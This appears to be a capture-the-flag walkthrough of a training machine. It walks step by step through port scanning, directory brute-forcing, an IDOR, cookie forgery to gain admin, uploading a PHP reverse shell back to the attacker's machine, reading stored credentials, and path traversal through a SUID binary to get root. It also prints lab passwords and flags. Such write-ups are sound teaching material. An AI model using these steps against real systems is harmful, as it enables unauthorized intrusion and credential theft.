Enumeration
As usual let's start with nmap
nmap -sV -sC 10.129.95.191
Port 80 is open so let's check the website.
Open your browser and type in the url bar: http://10.129.95.191
As usual let's start with gobuster. Locate the wordlist we are going to use first.
locate big.txt
Let's use the wordlist :
/opt/useful/SecLists/Discovery/Web-Content/big.txt
gobuster dir -u 10.129.95.191 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt
Let's use BurpSuite. Open Burpsuite and click on the Proxy tab
Turn off intercept
Click on Open Browser
In the url bar, type http://10.129.95.191
Go back to Burp and click on the Target tab
We found something interested, a directory called /cdn-cgi/login
This directory was not picked up by our gobuster earlier.
Let's open our browser from our VM and in the url bar, type:
http://10.129.95.191/cdn-cgi/login
We do not know any credentials but there is a link "Login as Guest"
Click on "Login as Guest"
We are logged in!
Let's click on Account
We are logged in as user guest, access ID 2233
Look at the url bar:
What if we were to change &id=2 into &id=1
Let's try, change the url at the end and press enter
Now we can see there is another user called admin with access ID 34322
We were not meant to see that, but it is a vulnerability of the target machine.
So we just learned that the user guest has a access ID of 2233 and the user admin has a access ID of 34322
Now let's click on the Uploads tab on the website:
This action require super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!
Right click on this web page and click on Inspect (Q)
Now Click on the Storage tab, we can see the following cookie:
At the moment we are logged in as the user guest with access ID 2233
What if we could change the cookie so that we are now user admin with access ID 34322
Let's try! Replace guest by admin and replace 2233 by 34322
Now refresh the uploads page and we now get the following:
We are now admin and we can now upload files!
Foothold
Now let's try to upload a file.
Let's first locate the php reverse shell file and edit it
Open a new command prompt from your VM and type:
locate webshells/php
cd /usr/share/webshells/php then:
ls
We are interested in php-reverse-shell.php
Let's make a copy of this file into our home directory by typing:
cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php 
My username is htb-sneakymouse on my VM, this is why I used /htb_sneakymouse Replace this by your own username.
Now open a brand new command prompt and type:
ls
I can see oopsie.php has been successfully copied to my home directory.
Let's now edit oopsie.php using:
sudo nano oopsie.php
Scroll down until you see $ip and $port
we need to change both ip and port
- replace 127.0.0.1 by the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0
- replace 1234 by 4444 (we will listen on port 4444 when we set up our netcat later)
Press Ctrl + X to exit
Press Y (to save)
Press enter
Now let's upload this file on the target machine. Let's go back to the upload tab on the website:
We can now click on Browse
We select our file oopsie.php and click on Open
Now click on Upload
Looks like our file oopsie.php has been uploaded successfully. However we still don't know where it has been uploaded.
Remember earlier when we did the gobuster command, it found a directory called /uploads
Perhaps this is where the file has been uploaded!
First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:
nc -lnvp 4444
Now let's try to locate and run oopsie.php we just uploaded to our target machine. In the url search bar, type:
Nothing should happen but if you go back to your netcat (nc) command prompt, you should now have a shell:
Type
whoami
Let's upgrade our shell using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls
cd home ls
cd robertls
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
Congratulations! you got the user flag!
Lateral Movement
sudo -l
Unfortunately, we don't have the password
Let's explore the files on the target machine. Let's start with var/www/html
cd /var/www/html
ls
cd cdn-cgils
cd loginls
cat db.php
Looks like we found some credentials
username: robert
password: M3g4C0rpUs3r!
This shell is not super stable but now we have some credentials!
We know from the nmap at the beginning that port 22 which is associated with ssh is open on the target machine. Let's try to ssh using roberts' credentials
ssh robert@10.129.95.191
The password is
M3g4C0rpUs3r!
We are in!
id
Privilege Escalation
locate bugtracker
cd /usr/bin
bugtracker
type 1 for instance
bugtracker
this time, type hello for instance
Interesting this time we get /root/reports/hello: No such file or directory
bugtrackerthis time type:
../root.txt
Congratulations! you found the root flag!
af13b0bee69f8a877c3faf667f7beacf